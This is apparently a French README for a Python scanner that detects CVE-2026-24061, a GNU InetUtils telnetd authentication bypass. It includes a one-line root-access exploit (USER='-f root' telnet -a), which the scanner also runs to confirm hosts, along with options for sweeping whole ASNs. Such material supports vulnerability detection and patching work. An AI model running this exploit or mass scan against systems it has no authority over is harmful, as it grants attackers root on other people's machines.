
CVE-2026-24061 - Contournement de l'authentification à distance de Telnetd GNU InetUtils
Un scanner Puissant, Rapide et Élégant pour détecter les services Telnetd vulnérables affectés par CVE-2026-24061. Conçu avec la bibliothèque standard Python pure - zéro dépendance externe requise.
CVE-2026-24061 est une vulnérabilité critique de contournement d'authentification dans GNU InetUtils Telnetd qui permet à des attaquants distants non authentifiés d'obtenir un accès root en exploitant la gestion de l'option NEW-ENVIRON.
Voici la configuration du service Telnetd côté hôte cible.
Et voici la preuve de concept (PoC) pour cette vulnérabilité, qui peut être exécutée manuellement depuis l'hôte de l'attaquant simplement en exécutant la commande USER="-f root" telnet -a <TARGET_HOST> 23.
La vulnérabilité exploite une validation incorrecte de la variable d'environnement USER dans la négociation de l'option telnet NEW-ENVIRON (RFC 1572), permettant aux attaquants d'injecter des valeurs malveillantes comme -f root pour contourner l'authentification.
9.8 (Critique) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner
# Make Executable
sudo chmod +x twenty-three-scanner.py
# Run the Script
sudo python3 twenty-three-scanner.py -h
Voici un manuel pour l'outil Twenty-Three Scanner qui peut être utilisé pour détecter la vulnérabilité CVE-2026-24061 - Contournement d'authentification à distance Telnetd GNU InetUtils.
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
[--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
options:
-h, --help show this help message and exit
Target Options:
-t TARGET, --target TARGET
target IP, CIDR, or comma-separated list (can be used multiple times)
-f FILE, --file FILE file containing targets (one per line, supports comments with #)
-a ASN, --asn ASN autonomous system number (e.g., AS10111 or 10111)
Scan Options:
-p PORT, --port PORT target port(s), comma-separated (default: 23)
--threads N number of concurrent threads (default: 50)
--user-value VALUE USER environment variable value for exploit (default: '-f root')
Timeout Options:
--connect-timeout SEC
TCP connection timeout in seconds (default: 3.0)
--read-timeout SEC socket read timeout in seconds (default: 2.0)
--id-timeout SEC 'id' command response timeout in seconds (default: 2.0)
Limit Options:
--max-hosts-per-cidr N
maximum hosts to scan per CIDR block (default: 1024)
--max-total-hosts N maximum total hosts across all targets (default: 50000)
--skip-large-networks
skip networks larger than /16 (avoids accidentally scanning huge ranges)
Output Options:
-o FILE, --output FILE
save vulnerable hosts to file (format: IP:PORT)
-v, --verbose enable verbose debug logging
Et voici quelques exemples d'utilisation de la commande.
# Scan Single IP Address, and Single Port
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23
# Scan Single IP Address, and Multiple Ports
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323
# Scan Multiple IP Addresses, and Single Port
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23
# Scan Multiple Addresses, and Multiple Ports
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323
# Scan CIDR Range, and Single Port with Results
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt
# Scan CIDR Range, and Multiple Ports with Results
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt
# Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output
sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt
# Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output
sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt
# Scan ASN and Single Port with Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100
# Scan ASN and Multiple Ports with Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100
# Scan ASN with Custom Limits and Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100
Analyse d'une adresse IP unique avec plusieurs ports.
Analyse de plusieurs adresses IP avec un port unique.
Analyse d'une plage CIDR avec un port unique.
Analyse d'un ASN avec plusieurs ports.
Analyse d'une adresse IP unique, de plusieurs adresses ou d'une plage CIDR depuis un fichier, et d'un port unique avec threads personnalisés et sortie.